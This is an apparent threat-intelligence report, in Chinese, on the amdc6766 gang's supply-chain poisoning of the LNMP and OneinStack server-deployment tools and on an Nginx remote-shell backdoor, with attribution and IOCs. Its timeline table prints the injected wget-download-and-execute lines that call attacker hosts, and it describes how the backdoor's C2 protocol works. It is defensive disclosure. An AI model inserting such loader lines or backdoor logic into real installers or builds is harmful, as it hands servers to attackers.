概要
2024年5月,深信服深瞻情报实验室,监测到LNMP遭受供应链投毒攻击。根据此次供应链攻击分析,深瞻情报实验室将该事件归因为amdc6766黑产组织。
2023上半年至今,amdc6766黑产组织利用仿冒页面(AMH、宝塔、Xshell、Navicat)、供应链投毒(LNMP、OneinStack)、公开web漏洞等攻击方式,针对运维人员开展定向攻击活动。运维人员从仿冒页面或官方平台下载并执行含有恶意代码的部署工具,与攻击者C2服务器建立DNS隧道连接。
该黑产组织定向投毒运维部署工具供应链,长期远控低价值主机作为肉鸡,择机选择高价值目标进行深度控制,下发Rootkit和代理工具,伺机从事各类黑产活动。
5月监测已有部分用户遭受供应链攻击,与攻击者C2服务器建立DNS隧道连接。
供应链投毒事件时间线
时间 | 软件名 | 被篡改的文件目录 | 植入恶意代码 |
2023年4月 | OneinStack | oneinstack/include/openssl.sh | wget http://download.cnoneinstack.com/oneinstack.jpg -cO /var/local/oneinstack.jpg \ tar zxf /var/local/oneinstack.jpg -C /var/local/ cd /var/local/cron \ ./load linux@QWE |
2023年4月 | LNMP | lnmp2.0/include/init.sh | wget http://lnmp01.amdc6766.net/lnmp.jpg -cO /var/local/lnmp.jpg \ tar zxf /var/local/lnmp.jpg -C /var/local/ cd /var/local/cron \ ./load linux@QWE |
2023年9月 | LNMP | lnmp2.0/include/init.sh、lnmp.sh | ../tools/lnmp.sh linhkkngf@QWE |
2023年10月 | OneinStack | /src/pcre-8.45.tar.gz/pcre-8.45/configure | wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null rm -f /var/local/osk.jpg /var/local/cron/load linhkkngf@QWE |
2024年4月 | LNMP/Nginx | Nginx-1.24/src/os/unix/ngx_process.c | 新增ngx_thread_pool函数 |
供应链投毒事件分析
此次攻击者使用新的供应链攻击路径,通过LNMP下载并编译被植入恶意代码的Nginx源码,达到植入Nginx后门的目的,较之前更为隐蔽。
LNMP官方网站下载链接的lnmp2.0.tar.gz大小为201KB,其md5值为a3a931ffa6cce98268151d4701cb9fba,与官网标注的大小196KB和md5值1a02938df2e449a35caec4e10aa3ae7a不一致。
version.sh脚本中配置下载nginx-1.24.0.tar.gz。
lnmp.conf配置下载地址为https://soft.lnmp.com。
运行LNMP2.0安装脚本install.sh,下载nginx-1.24.0.tar.gz,MD5为bd20c0791c5616f0cda944a9aa587beb。
下载编译安装完成后,删除nginx-1.24.0.tar.gz。
目前,官方已经下架nginx-1.24.0.tar.gz源码压缩包。
分析编译后的恶意nginx-1.24.0,植入ngx_thread_pool函数。
ngx_thread_pool函数作用提供一个远程执行命令的功能。
首先异或解密出C2域名为nginx.dev。
向nginx.dev发送socket请求。
根据C2返回的数据缓冲区的一个字节,来执行不同操作。
0x03:fork子进程/bin/sh,将后续数据作为命令执行,并将执行结果发送回C2服务器。
0x08:将休眠时间设置为 86400 秒(24h)。
0x09:将休眠时间设置为 10 秒。
攻击者连接Nginx后门,下载cron.zip密码amdc6766!@#解压并执行install恶意程序。
关联分析
此次供应链攻击事件的分析发现,与上半年监测到的amdc6766团伙多起供应链投毒的具有较高相似性,后续下载的攻击套件与历史上amdc6766团伙攻击事件TTPs相同,如:
- 压缩包密码为amdc6766!@#
- 恶意文件伪装为jpg
- 加载器的参数相似linux@QWE或linhkkngf@QWE
- install执行参数相同linux@QWE
- 利用crond服务实现持久化
- 执行crond程序加载恶意动态链接库
- 建立DNS隧道连接
- 加载内核态Rootkit,实现UDP远控
amdc6766团伙的完整攻击流程,
amdc6766黑产组织长期利用仿冒页面、供应链投毒、公开web漏洞等攻击方式,针对运维人员常用软件Navicat、Xshell、LNMP、AMH、OneinStack、宝塔等开展定向攻击活动,选择出高价值目标后,植入动态链接库、Rootkit、恶意crond服务等持久化手段长期控制主机,伺机发起各类黑产攻击活动。
IOC
xg.x2kk.com
mg.x2kk.com
gz.x2kk.com
x2kk.com
aliyun.topsec360.com
baidu.topsec360.com
nginx.dev
8.217.202.103
8.134.94.44
bd20c0791c5616f0cda944a9aa587beb
3f808c34aa3e63ef7d8e651c0dd4b9fa
8a52a20b1aa0c3876b64409f772e2436
6ef60b19d328e663fe33473b947be953
3f808c34aa3e63ef7d8e651c0dd4b9fa
a3a931ffa6cce98268151d4701cb9fba
a4509c21c8a6e324ae95436a46270bd6
b9128148ad7cb6a0f2a1c8e40786ff59
8fbbace71d1d7cb681066dd17535a959
adc94cd2079fa8cf7c28ed56be56cf5b
87257e0e7bc8dedf72122ce0a4ca7608